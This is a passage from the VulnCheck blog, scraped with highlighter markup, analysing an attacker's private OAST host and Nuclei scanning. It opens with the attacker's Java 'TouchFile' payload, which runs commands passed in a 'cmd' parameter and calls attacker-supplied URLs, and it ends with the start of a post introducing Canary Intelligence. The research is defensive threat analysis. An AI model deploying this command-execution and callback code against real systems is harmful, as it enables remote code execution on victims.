ArrayList \u003C > ();\n\n URL codebase = TouchFile.class.getProtectionDomain()\n .getCodeSource()\n .getLocation();\n if (codebase != null) {\n String s = codebase.toString();\n int idx = s.indexOf(\"?\");\n if (idx != -1 && idx \u003C s.length() - 1) {\n Map \u003C String, List \u003C String >> params = new HashMap \u003C > ();\n String query = s.substring(idx + 1);\n for (String part: query.split(\"&\")) {\n String[] kv = part.split(\"=\", 2);\n if (kv.length == 2) {\n params.computeIfAbsent(kv[0], k -> new ArrayList \u003C > ())\n .add(URLDecoder.decode(kv[1], \"UTF-8\"));\n }\n }\n if (params.containsKey(\"cmd\")) {\n cmds.addAll(params.get(\"cmd\"));\n }\n if (params.containsKey(\"http\")) {\n urls.addAll(params.get(\"http\"));\n }\n }\n }\n\n if (cmds.isEmpty()) {\n cmds.add(defaultCmd);\n }\n\n for (String cmd: cmds) {\n Process p = Runtime.getRuntime().exec(cmd.split(\" \"));\n p.waitFor();\n }\n\n for (String u: urls) {\n HttpURLConnection c = (HttpURLConnection) new URL(u).openConnection();\n c.setRequestMethod(\"GET\");\n c.getResponseCode();\n }\n } catch (Exception e) {\n e.printStackTrace(System.err);\n }\n }\n}\n","java",[886,27198,27199,27211,27218,27224,27243,27273,27298,27302,27327,27337,27346,27364,27384,27412,27451,27488,27515,27551,27583,27605,27642,27679,27683,27688,27714,27743,27747,27771,27798,27802,27806,27811,27815,27834,27850,27854,27858,27879,27918,27930,27934,27938,27958,27993,28013,28024,28028,28047,28068,28072,28076],{"__ignoreMap":219},[1373,27200,27201,27203,27206,27209],{"class":1375,"line":1376},[1373,27202,15019],{"class":4652},[1373,27204,27205],{"class":4652}," class",[1373,27207,27208],{"class":14938}," TouchFile",[1373,27210,4765],{"class":1383},[1373,27212,27213,27216],{"class":1375,"line":220},[1373,27214,27215],{"class":4652}," static",[1373,27217,4765],{"class":1383},[1373,27219,27220,27222],{"class":1375,"line":1266},[1373,27221,11752],{"class":4636},[1373,27223,4765],{"class":1383},[1373,27225,27226,27230,27233,27235,27237,27239,27241],{"class":1375,"line":1852},[1373,27227,27229],{"class":27228},"syw9h"," String",[1373,27231,27232],{"class":4640}," defaultCmd ",[1373,27234,5417],{"class":1397},[1373,27236,4883],{"class":1387},[1373,27238,27181],{"class":1391},[1373,27240,183],{"class":1387},[1373,27242,4912],{"class":1383},[1373,27244,27245,27248,27251,27254,27256,27259,27261,27263,27266,27268,27270],{"class":1375,"line":4692},[1373,27246,27247],{"class":27228}," List",[1373,27249,27250],{"class":1383}," \u003C",[1373,27252,27253],{"class":7293}," String",[1373,27255,11741],{"class":1383},[1373,27257,27258],{"class":4640}," cmds ",[1373,27260,5417],{"class":1397},[1373,27262,15283],{"class":4636},[1373,27264,27265],{"class":27228}," ArrayList",[1373,27267,27250],{"class":1383},[1373,27269,11741],{"class":1383},[1373,27271,27272],{"class":1383}," ();\n",[1373,27274,27275,27277,27279,27281,27283,27286,27288,27290,27292,27294,27296],{"class":1375,"line":4724},[1373,27276,27247],{"class":27228},[1373,27278,27250],{"class":1383},[1373,27280,27253],{"class":7293},[1373,27282,11741],{"class":1383},[1373,27284,27285],{"class":4640}," urls ",[1373,27287,5417],{"class":1397},[1373,27289,15283],{"class":4636},[1373,27291,27265],{"class":27228},[1373,27293,27250],{"class":1383},[1373,27295,11741],{"class":1383},[1373,27297,27272],{"class":1383},[1373,27299,27300],{"class":1375,"line":4756},[1373,27301,6520],{"emptyLinePlaceholder":237},[1373,27303,27304,27307,27310,27312,27314,27316,27319,27321,27324],{"class":1375,"line":4768},[1373,27305,27306],{"class":27228}," URL",[1373,27308,27309],{"class":4640}," codebase ",[1373,27311,5417],{"class":1397},[1373,27313,27208],{"class":4640},[1373,27315,59],{"class":1383},[1373,27317,27318],{"class":4640},"class",[1373,27320,59],{"class":1383},[1373,27322,27323],{"class":7297},"getProtectionDomain",[1373,27325,27326],{"class":1383},"()\n",[1373,27328,27329,27332,27335],{"class":1375,"line":4792},[1373,27330,27331],{"class":1383}," .",[1373,27333,27334],{"class":7297},"getCodeSource",[1373,27336,27326],{"class":1383},[1373,27338,27339,27341,27344],{"class":1375,"line":4798},[1373,27340,27331],{"class":1383},[1373,27342,27343],{"class":7297},"getLocation",[1373,27345,15603],{"class":1383},[1373,27347,27348,27351,27353,27356,27358,27360,27362],{"class":1375,"line":4806},[1373,27349,27350],{"class":4636}," if",[1373,27352,4641],{"class":1383},[1373,27354,27355],{"class":4640},"codebase ",[1373,27357,15677],{"class":1397},[1373,27359,15680],{"class":7054},[1373,27361,2230],{"class":1383},[1373,27363,4765],{"class":1383},[1373,27365,27366,27369,27372,27374,27377,27379,27382],{"class":1375,"line":4817},[1373,27367,27368],{"class":27228}," String",[1373,27370,27371],{"class":4640}," s ",[1373,27373,5417],{"class":1397},[1373,27375,27376],{"class":4640}," codebase",[1373,27378,59],{"class":1383},[1373,27380,27381],{"class":7297},"toString",[1373,27383,15603],{"class":1383},[1373,27385,27386,27389,27392,27394,27397,27399,27402,27404,27406,27408,27410],{"class":1375,"line":4825},[1373,27387,27388],{"class":7293}," int",[1373,27390,27391],{"class":4640}," idx ",[1373,27393,5417],{"class":1397},[1373,27395,27396],{"class":4640}," s",[1373,27398,59],{"class":1383},[1373,27400,27401],{"class":7297},"indexOf",[1373,27403,1384],{"class":1383},[1373,27405,183],{"class":1387},[1373,27407,13993],{"class":1391},[1373,27409,183],{"class":1387},[1373,27411,4680],{"class":1383},[1373,27413,27414,27416,27418,27421,27423,27426,27428,27430,27432,27434,27436,27438,27441,27443,27445,27447,27449],{"class":1375,"line":4835},[1373,27415,9773],{"class":4636},[1373,27417,4641],{"class":1383},[1373,27419,27420],{"class":4640},"idx ",[1373,27422,15677],{"class":1397},[1373,27424,27425],{"class":1397}," -",[1373,27427,467],{"class":5467},[1373,27429,16622],{"class":1397},[1373,27431,27391],{"class":4640},[1373,27433,11852],{"class":1397},[1373,27435,27396],{"class":4640},[1373,27437,59],{"class":1383},[1373,27439,27440],{"class":7297},"length",[1373,27442,7514],{"class":1383},[1373,27444,27425],{"class":1397},[1373,27446,5468],{"class":5467},[1373,27448,2230],{"class":1383},[1373,27450,4765],{"class":1383},[1373,27452,27453,27456,27458,27460,27462,27465,27467,27469,27472,27475,27477,27479,27482,27484,27486],{"class":1375,"line":4843},[1373,27454,27455],{"class":27228}," Map",[1373,27457,27250],{"class":1383},[1373,27459,27253],{"class":7293},[1373,27461,5437],{"class":1383},[1373,27463,27464],{"class":27228}," List",[1373,27466,27250],{"class":1383},[1373,27468,27253],{"class":7293},[1373,27470,27471],{"class":1383}," >>",[1373,27473,27474],{"class":4640}," params ",[1373,27476,5417],{"class":1397},[1373,27478,15283],{"class":4636},[1373,27480,27481],{"class":27228}," HashMap",[1373,27483,27250],{"class":1383},[1373,27485,11741],{"class":1383},[1373,27487,27272],{"class":1383},[1373,27489,27490,27493,27496,27498,27500,27502,27505,27507,27509,27511,27513],{"class":1375,"line":4849},[1373,27491,27492],{"class":27228}," String",[1373,27494,27495],{"class":4640}," query ",[1373,27497,5417],{"class":1397},[1373,27499,27396],{"class":4640},[1373,27501,59],{"class":1383},[1373,27503,27504],{"class":7297},"substring",[1373,27506,1384],{"class":1383},[1373,27508,27420],{"class":4640},[1373,27510,15448],{"class":1397},[1373,27512,5468],{"class":5467},[1373,27514,4680],{"class":1383},[1373,27516,27517,27520,27522,27525,27528,27530,27533,27535,27538,27540,27542,27544,27546,27549],{"class":1375,"line":4877},[1373,27518,27519],{"class":4636}," for",[1373,27521,4641],{"class":1383},[1373,27523,27524],{"class":27228},"String",[1373,27526,27527],{"class":4640}," part",[1373,27529,4606],{"class":4636},[1373,27531,27532],{"class":4640}," query",[1373,27534,59],{"class":1383},[1373,27536,27537],{"class":7297},"split",[1373,27539,1384],{"class":1383},[1373,27541,183],{"class":1387},[1373,27543,7218],{"class":1391},[1373,27545,183],{"class":1387},[1373,27547,27548],{"class":1383},"))",[1373,27550,4765],{"class":1383},[1373,27552,27553,27556,27558,27561,27563,27565,27567,27569,27571,27573,27575,27577,27579,27581],{"class":1375,"line":4915},[1373,27554,27555],{"class":7293}," String",[1373,27557,7124],{"class":1383},[1373,27559,27560],{"class":4640}," kv ",[1373,27562,5417],{"class":1397},[1373,27564,27527],{"class":4640},[1373,27566,59],{"class":1383},[1373,27568,27537],{"class":7297},[1373,27570,1384],{"class":1383},[1373,27572,183],{"class":1387},[1373,27574,5417],{"class":1391},[1373,27576,183],{"class":1387},[1373,27578,5437],{"class":1383},[1373,27580,5499],{"class":5467},[1373,27582,4680],{"class":1383},[1373,27584,27585,27587,27589,27592,27594,27597,27599,27601,27603],{"class":1375,"line":4931},[1373,27586,9793],{"class":4636},[1373,27588,4641],{"class":1383},[1373,27590,27591],{"class":4640},"kv",[1373,27593,59],{"class":1383},[1373,27595,27596],{"class":4640},"length ",[1373,27598,15920],{"class":1397},[1373,27600,5499],{"class":5467},[1373,27602,2230],{"class":1383},[1373,27604,4765],{"class":1383},[1373,27606,27607,27610,27612,27615,27617,27619,27621,27623,27626,27629,27631,27633,27635,27637,27639],{"class":1375,"line":4947},[1373,27608,27609],{"class":4640}," params",[1373,27611,59],{"class":1383},[1373,27613,27614],{"class":7297},"computeIfAbsent",[1373,27616,1384],{"class":1383},[1373,27618,27591],{"class":4640},[1373,27620,7035],{"class":1383},[1373,27622,445],{"class":5467},[1373,27624,27625],{"class":1383},"],",[1373,27627,27628],{"class":4640}," k ",[1373,27630,4667],{"class":7293},[1373,27632,15283],{"class":4636},[1373,27634,27265],{"class":27228},[1373,27636,27250],{"class":1383},[1373,27638,11741],{"class":1383},[1373,27640,27641],{"class":1383}," ())\n",[1373,27643,27644,27647,27650,27652,27655,27657,27660,27662,27664,27666,27668,27670,27672,27675,27677],{"class":1375,"line":4952},[1373,27645,27646],{"class":1383}," .",[1373,27648,27649],{"class":7297},"add",[1373,27651,1384],{"class":1383},[1373,27653,27654],{"class":4640},"URLDecoder",[1373,27656,59],{"class":1383},[1373,27658,27659],{"class":7297},"decode",[1373,27661,1384],{"class":1383},[1373,27663,27591],{"class":4640},[1373,27665,7035],{"class":1383},[1373,27667,467],{"class":5467},[1373,27669,27625],{"class":1383},[1373,27671,4883],{"class":1387},[1373,27673,27674],{"class":1391},"UTF-8",[1373,27676,183],{"class":1387},[1373,27678,1413],{"class":1383},[1373,27680,27681],{"class":1375,"line":6776},[1373,27682,9832],{"class":1383},[1373,27684,27685],{"class":1375,"line":6781},[1373,27686,27687],{"class":1383}," }\n",[1373,27689,27690,27693,27695,27697,27699,27702,27704,27706,27708,27710,27712],{"class":1375,"line":7524},[1373,27691,27692],{"class":4636}," if",[1373,27694,4641],{"class":1383},[1373,27696,7627],{"class":4640},[1373,27698,59],{"class":1383},[1373,27700,27701],{"class":7297},"containsKey",[1373,27703,1384],{"class":1383},[1373,27705,183],{"class":1387},[1373,27707,17653],{"class":1391},[1373,27709,183],{"class":1387},[1373,27711,27548],{"class":1383},[1373,27713,4765],{"class":1383},[1373,27715,27716,27719,27721,27724,27726,27728,27730,27733,27735,27737,27739,27741],{"class":1375,"line":7530},[1373,27717,27718],{"class":4640}," cmds",[1373,27720,59],{"class":1383},[1373,27722,27723],{"class":7297},"addAll",[1373,27725,1384],{"class":1383},[1373,27727,7627],{"class":4640},[1373,27729,59],{"class":1383},[1373,27731,27732],{"class":7297},"get",[1373,27734,1384],{"class":1383},[1373,27736,183],{"class":1387},[1373,27738,17653],{"class":1391},[1373,27740,183],{"class":1387},[1373,27742,1413],{"class":1383},[1373,27744,27745],{"class":1375,"line":7546},[1373,27746,27687],{"class":1383},[1373,27748,27749,27751,27753,27755,27757,27759,27761,27763,27765,27767,27769],{"class":1375,"line":7571},[1373,27750,27692],{"class":4636},[1373,27752,4641],{"class":1383},[1373,27754,7627],{"class":4640},[1373,27756,59],{"class":1383},[1373,27758,27701],{"class":7297},[1373,27760,1384],{"class":1383},[1373,27762,183],{"class":1387},[1373,27764,6277],{"class":1391},[1373,27766,183],{"class":1387},[1373,27768,27548],{"class":1383},[1373,27770,4765],{"class":1383},[1373,27772,27773,27776,27778,27780,27782,27784,27786,27788,27790,27792,27794,27796],{"class":1375,"line":7598},[1373,27774,27775],{"class":4640}," urls",[1373,27777,59],{"class":1383},[1373,27779,27723],{"class":7297},[1373,27781,1384],{"class":1383},[1373,27783,7627],{"class":4640},[1373,27785,59],{"class":1383},[1373,27787,27732],{"class":7297},[1373,27789,1384],{"class":1383},[1373,27791,183],{"class":1387},[1373,27793,6277],{"class":1391},[1373,27795,183],{"class":1387},[1373,27797,1413],{"class":1383},[1373,27799,27800],{"class":1375,"line":7615},[1373,27801,27687],{"class":1383},[1373,27803,27804],{"class":1375,"line":7635},[1373,27805,9861],{"class":1383},[1373,27807,27808],{"class":1375,"line":7640},[1373,27809,27810],{"class":1383}," }\n",[1373,27812,27813],{"class":1375,"line":7648},[1373,27814,6520],{"emptyLinePlaceholder":237},[1373,27816,27817,27819,27821,27824,27826,27829,27832],{"class":1375,"line":7672},[1373,27818,27350],{"class":4636},[1373,27820,4641],{"class":1383},[1373,27822,27823],{"class":4640},"cmds",[1373,27825,59],{"class":1383},[1373,27827,27828],{"class":7297},"isEmpty",[1373,27830,27831],{"class":1383},"())",[1373,27833,4765],{"class":1383},[1373,27835,27836,27839,27841,27843,27845,27848],{"class":1375,"line":7688},[1373,27837,27838],{"class":4640}," cmds",[1373,27840,59],{"class":1383},[1373,27842,27649],{"class":7297},[1373,27844,1384],{"class":1383},[1373,27846,27847],{"class":4640},"defaultCmd",[1373,27849,4680],{"class":1383},[1373,27851,27852],{"class":1375,"line":7709},[1373,27853,27810],{"class":1383},[1373,27855,27856],{"class":1375,"line":7714},[1373,27857,6520],{"emptyLinePlaceholder":237},[1373,27859,27860,27863,27865,27867,27870,27872,27875,27877],{"class":1375,"line":7722},[1373,27861,27862],{"class":4636}," for",[1373,27864,4641],{"class":1383},[1373,27866,27524],{"class":27228},[1373,27868,27869],{"class":4640}," cmd",[1373,27871,4606],{"class":4636},[1373,27873,27874],{"class":4640}," cmds",[1373,27876,2230],{"class":1383},[1373,27878,4765],{"class":1383},[1373,27880,27881,27884,27887,27889,27892,27894,27897,27899,27902,27904,27906,27908,27910,27912,27914,27916],{"class":1375,"line":9903},[1373,27882,27883],{"class":27228}," Process",[1373,27885,27886],{"class":4640}," p ",[1373,27888,5417],{"class":1397},[1373,27890,27891],{"class":4640}," Runtime",[1373,27893,59],{"class":1383},[1373,27895,27896],{"class":7297},"getRuntime",[1373,27898,16355],{"class":1383},[1373,27900,27901],{"class":7297},"exec",[1373,27903,1384],{"class":1383},[1373,27905,17653],{"class":4640},[1373,27907,59],{"class":1383},[1373,27909,27537],{"class":7297},[1373,27911,1384],{"class":1383},[1373,27913,183],{"class":1387},[1373,27915,4883],{"class":1387},[1373,27917,1413],{"class":1383},[1373,27919,27920,27923,27925,27928],{"class":1375,"line":9908},[1373,27921,27922],{"class":4640}," p",[1373,27924,59],{"class":1383},[1373,27926,27927],{"class":7297},"waitFor",[1373,27929,15603],{"class":1383},[1373,27931,27932],{"class":1375,"line":9913},[1373,27933,27810],{"class":1383},[1373,27935,27936],{"class":1375,"line":9932},[1373,27937,6520],{"emptyLinePlaceholder":237},[1373,27939,27940,27942,27944,27946,27949,27951,27954,27956],{"class":1375,"line":9937},[1373,27941,27862],{"class":4636},[1373,27943,4641],{"class":1383},[1373,27945,27524],{"class":27228},[1373,27947,27948],{"class":4640}," u",[1373,27950,4606],{"class":4636},[1373,27952,27953],{"class":4640}," urls",[1373,27955,2230],{"class":1383},[1373,27957,4765],{"class":1383},[1373,27959,27960,27963,27966,27968,27970,27973,27975,27977,27980,27982,27985,27988,27991],{"class":1375,"line":9957},[1373,27961,27962],{"class":27228}," HttpURLConnection",[1373,27964,27965],{"class":4640}," c ",[1373,27967,5417],{"class":1397},[1373,27969,4641],{"class":1383},[1373,27971,27972],{"class":4640},"HttpURLConnection",[1373,27974,2230],{"class":1383},[1373,27976,15283],{"class":4636},[1373,27978,27979],{"class":7297}," URL",[1373,27981,1384],{"class":1383},[1373,27983,27984],{"class":4640},"u",[1373,27986,27987],{"class":1383},").",[1373,27989,27990],{"class":7297},"openConnection",[1373,27992,15603],{"class":1383},[1373,27994,27995,27998,28000,28003,28005,28007,28009,28011],{"class":1375,"line":9962},[1373,27996,27997],{"class":4640}," c",[1373,27999,59],{"class":1383},[1373,28001,28002],{"class":7297},"setRequestMethod",[1373,28004,1384],{"class":1383},[1373,28006,183],{"class":1387},[1373,28008,6284],{"class":1391},[1373,28010,183],{"class":1387},[1373,28012,4680],{"class":1383},[1373,28014,28015,28017,28019,28022],{"class":1375,"line":15955},[1373,28016,27997],{"class":4640},[1373,28018,59],{"class":1383},[1373,28020,28021],{"class":7297},"getResponseCode",[1373,28023,15603],{"class":1383},[1373,28025,28026],{"class":1375,"line":16030},[1373,28027,27810],{"class":1383},[1373,28029,28030,28033,28036,28038,28040,28043,28045],{"class":1375,"line":16035},[1373,28031,28032],{"class":1383}," }",[1373,28034,28035],{"class":4636}," catch",[1373,28037,4641],{"class":1383},[1373,28039,18887],{"class":27228},[1373,28041,28042],{"class":19096}," e",[1373,28044,2230],{"class":1383},[1373,28046,4765],{"class":1383},[1373,28048,28049,28052,28054,28057,28059,28061,28063,28066],{"class":1375,"line":16083},[1373,28050,28051],{"class":4640}," e",[1373,28053,59],{"class":1383},[1373,28055,28056],{"class":7297},"printStackTrace",[1373,28058,1384],{"class":1383},[1373,28060,16247],{"class":4640},[1373,28062,59],{"class":1383},[1373,28064,28065],{"class":4640},"err",[1373,28067,4680],{"class":1383},[1373,28069,28070],{"class":1375,"line":16098},[1373,28071,4795],{"class":1383},[1373,28073,28074],{"class":1375,"line":16103},[1373,28075,27147],{"class":1383},[1373,28077,28078],{"class":1375,"line":16147},[1373,28079,1855],{"class":1383},[18,28081,28082],{},"The behavior of TouchFile.class illustrates how the attacker adapts publicly available tooling to their needs. It is a small detail, but it shows that the actor is willing to modify common exploit components rather than rely on them exactly as published.",[1920,28084,1903],{"id":1902},[18,28086,28087],{},"Taken together, the use of a private OAST host, a mix of outdated and current Nuclei templates, and a custom Fastjson payload indicates an operation with more structure than typical exploit spraying. The long-lived OAST infrastructure and the consistent regional focus suggest an actor that is running a sustained scanning effort rather than short-lived opportunistic probes.",[18,28089,28090],{},"Regardless of attribution, this activity highlights a broader trend. Attackers continue to take off-the-shelf tooling like Nuclei and spray exploits across the internet to quickly identify and compromise vulnerable assets. They show little concern for the indicators or compromised accounts these tools leave behind, as long as the approach helps them find targets efficiently. The only way to protect yourself from such attackers is to monitor your network, understand what is exposed, and outpace adversaries.",[1920,28092,202],{"id":201},[18,28094,28095,28096,982,28099,28102,28103,982,28108,59],{},"VulnCheck’s research team tracks attacker infrastructure and exploit activity using our ",[47,28097,283],{"href":281,"rel":28098},[51],[47,28100,1251],{"href":1249,"rel":28101},[51]," datasets. Investigations like this one into attacker-run OAST services and structured scanning workflows are part of our ongoing effort to highlight real-world exploitation trends. For more research like this check out our blogs, ",[1131,28104,28105],{},[47,28106,10801],{"href":10796,"rel":28107},[51],[1131,28109,28110],{},[47,28111,24026],{"href":24024,"rel":28112},[51],[18,28114,1228,28115,1234,28118,1240,28121,1246,28124,1246,28127,1255,28130,1260],{},[47,28116,1233],{"href":10806,"rel":28117},[51],[47,28119,1239],{"href":1237,"rel":28120},[51],[47,28122,1245],{"href":1243,"rel":28123},[51],[47,28125,1251],{"href":1249,"rel":28126},[51],[47,28128,283],{"href":281,"rel":28129},[51],[47,28131,216],{"href":1258,"rel":28132},[51],[2901,28134,28135],{},"html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .saDeg, html code.shiki .saDeg{--shiki-light:#39ADB5;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sEff5, html code.shiki .sEff5{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sh1VR, html code.shiki .sh1VR{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#CFCFC2}html pre.shiki code .sINAO, html code.shiki .sINAO{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#CFCFC2}html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .s_MOj, html code.shiki .s_MOj{--shiki-light:#E2931D;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .sMTiH, html code.shiki .sMTiH{--shiki-light:#39ADB5;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sTNss, html code.shiki .sTNss{--shiki-light:#9C3EDA;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .sKvfc, html code.shiki .sKvfc{--shiki-light:#E2931D;--shiki-light-text-decoration:inherit;--shiki-default:#6F42C1;--shiki-default-text-decoration:inherit;--shiki-dark:#B392F0;--shiki-dark-text-decoration:inherit;--shiki-sepia:#A6E22E;--shiki-sepia-text-decoration:underline}html pre.shiki code .sRxSC, html code.shiki .sRxSC{--shiki-light:#39ADB5;--shiki-light-font-style:italic;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#F92672;--shiki-sepia-font-style:inherit}html pre.shiki code .syw9h, html code.shiki .syw9h{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#24292E;--shiki-default-font-style:inherit;--shiki-dark:#E1E4E8;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .srJo8, html code.shiki .srJo8{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sD0ED, html code.shiki .sD0ED{--shiki-light:#6182B8;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sQgqH, html code.shiki .sQgqH{--shiki-light:#90A4AE;--shiki-light-font-style:italic;--shiki-default:#E36209;--shiki-default-font-style:inherit;--shiki-dark:#FFAB70;--shiki-dark-font-style:inherit;--shiki-sepia:#FD971F;--shiki-sepia-font-style:italic}",{"title":219,"searchDepth":220,"depth":220,"links":28137},[],"2025-11-27","VulnCheck Canary Intelligence uncovered a long-running attacker-owned OAST service operating from Google Cloud. The actor blended stock Nuclei templates with custom payloads while focusing their activity on canaries deployed in a single region. This unusual combination reveals a structured, sustained scanning operation rather than ordinary opportunistic spraying.",{"slug":28141},"mystery-oast","\u002Fblog\u002Fmystery-oast",{"title":10793,"description":28139},"blog\u002Fmystery-oast",[2941,242,1279],"dosnKIlFnwaMV9j7u-0kHUpGko0M9C4KBi1d0axQD1I",{"id":28148,"title":28149,"articles":28150,"authors":28160,"body":28162,"date":29780,"description":29781,"extension":234,"image":7,"link":7,"meta":29782,"navigation":237,"path":29784,"seo":29785,"series":7,"stem":29786,"subtype":7,"tags":29787,"__hash__":29788},"blog\u002Fblog\u002Fintroducing-vulncheck-canary-intelligence.md","Introducing VulnCheck Canary Intelligence",[28151,28155],{"title":28152,"source":14382,"link":28153,"date":28154},"Fortinet Warns of New FortiWeb CVE-2025-58034 Vulnerability Exploited in the Wild","https:\u002F\u002Fthehackernews.com\u002F2025\u002F11\u002Ffortinet-warns-of-new-fortiweb-cve-2025.html","2025-11-19",{"title":28156,"source":28157,"link":28158,"date":28159},"Endpoint Security and Network Monitoring News for the Week of November 21st","Solutions Review","https:\u002F\u002Fsolutionsreview.com\u002Fendpoint-security\u002Fendpoint-security-and-network-monitoring-news-for-the-week-of-november-21st\u002F","2025-11-21",[28161],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":28163,"toc":29769},[28164,28167,28173,28177,28189,28193,28200,28206,28217,28492,28499,28634,28637,28640,28654,28657,28661,28664,28668,28671,29374,29377,29383,29386,29389,29393,29400,29719,29721,29724,29738,29741,29750,29754,29766],[61,28165,19621],{"id":28166},"vulncheck-canary-intelligence",[18,28168,28169,28172],{},[47,28170,19621],{"href":28171},"\u002Fproduct\u002Fcanary-intelligence"," is a new offering that captures real-world exploitation as it happens. The dataset is built from a global network of intentionally vulnerable systems that we call canaries. Our canaries record live attacker activity including payloads, IP addresses, geolocation data, and exploited CVEs. This provides defenders with ground-truth visibility into what vulnerabilities are actively targeted in the wild. This isn’t theoretical, it’s verified exploitation telemetry from real attacks on real software.",[61,28174,28176],{"id":28175},"why-we-built-it","Why We Built It",[18,28178,28179,28180,28183,28184,28188],{},"VulnCheck believes the most important vulnerabilities are those actively exploited in the wild. Acting on that belief, we built Suricata and Snort rules for ",[47,28181,1245],{"href":1243,"rel":28182},[51]," to detect exploitation in network traffic. It’s also why we’ve invested so heavily in curating our freely available ",[47,28185,28187],{"href":10806,"rel":28186},[51],"VulnCheck Known Exploited Vulnerability"," (KEV) database. However, the public reporting that KEV relies on can sometimes trail behind real-world exploitation. Canaries close that gap by applying our network detection rules across the internet. Attacks observed by Canaries can appear in the VulnCheck KEV within minutes of exploitation, giving defenders critical time to respond to the vulnerabilities that actually matter.",[61,28190,28192],{"id":28191},"how-it-works","How It Works",[18,28194,28195,28196,28199],{},"VulnCheck canaries are a natural evolution of our product offering. Building on VulnCheck ",[47,28197,1245],{"href":1243,"rel":28198},[51],", which provides intentionally vulnerable Docker containers for customers to test exploits and detections, we’ve deployed these same systems across the Internet to observe how attackers interact with real software. Unlike a honeypot, which can be fingerprinted and intentionally evaded by threat actors, a canary always appears genuine, because it is.",[18,28201,28202],{},[68,28203],{"alt":19621,"src":28204,"width":28205},"\u002Fblog\u002Fintroducing-vulncheck-canary-intelligence\u002Fvulncheck-canary-intelligence.png",1200,[18,28207,28208,28209,28212,28213,28216],{},"VulnCheck Canary Intelligence delivers detailed exploitation telemetry and makes it possible to infer associated Command & Control (C2) infrastructure. With this visibility, defenders can distinguish low-effort scans (e.g., Nuclei) from more advanced or targeted attacks. For example, VulnCheck was the first to ",[47,28210,5061],{"href":24024,"rel":28211},[51]," real exploitation of ",[47,28214,23717],{"href":23715,"rel":28215},[51],", an unauthenticated remote code execution vulnerability in ICTBroadcast call center software. The data we provide to VulnCheck Canary Intelligence customers looks like this:",[1354,28218,28220],{"className":22307,"code":28219,"language":22309,"meta":219,"style":219}," {\n \"src_ip\": \"159.65.227.190\",\n \"src_port\": 38761,\n \"src_country\": \"US\",\n \"dst_country\": \"US\",\n \"cve\": \"CVE-2025-2611\",\n \"signature_id\": 12700629,\n \"signature\": \"VULNCHECK ICTBroadcast CVE-2025-2611 Exploit Attempt\",\n 